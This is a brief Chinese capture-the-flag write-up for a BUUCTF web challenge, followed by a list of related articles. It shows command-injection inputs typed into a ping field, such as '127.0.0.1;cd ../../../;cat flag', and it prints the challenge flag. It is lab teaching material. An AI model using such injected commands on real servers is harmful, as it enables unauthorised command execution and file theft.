[ACTF2020 新生赛]Exec

题目来源：buuctf

题目类型：web

涉及考点：目录遍历

1. 题目直接给了一个输入框，ping一下127.0.0.1看看

接着查看目录，直接127.0.0.1;ls：

只有index.php，我们先看看：

127.0.0.1;cat index.php

发现还是这个输入页面，没别的东西了，我们接下来目录遍历去找flag

2. 逐步往上层遍历

利用 ../ 向上遍历，当传入127.0.0.1;cd ../../../;ls 时看到了flag：

直接查看就有了，最终构造的payload如下：

127.0.0.1;cd ../../../;cat flag

flag{d666afef-8d93-4e23-9a6c-46a14704e4bd}

3. 小结一下

目录遍历是一个Web安全漏洞，攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。如果没有针对目录遍历攻击采取任何防御措施，攻击者可以通过请求URL从服务器的文件系统中检索任意文件。

日期：2023.7.20

作者：y0Zero

本栏目推荐文章
• mrctf2020_easyoverflow
• python 里面的eval exec 还有compile
• CVE-2020-11800
• 【LeetCode 1635. Hopper 公司查询 I】with recursive生成2020年每月的最后一天
• 2020-2021 ACM-ICPC, Asia Seoul Regional Contest
• [ACTF2020 新生赛]Exec 1
• “华为杯”杭州电子科技大学2023新生编程大赛 1005
• wustctf2020_getshell_2
• P6646 [CCO2020] Shopping Plans
• 电脑加速：让你的电脑重获新生

新生 ACTF 2020 Exec新生actf 2020 exec backupfile新生actf 2020 新生include actf 2020 新生actf 2020 rome frequency新生actf 2020 outguess新生actf 2020 新生easyre actf 2020 usualcrypt新生actf 2020 新生include笔记actf 新生buuctf oruga actf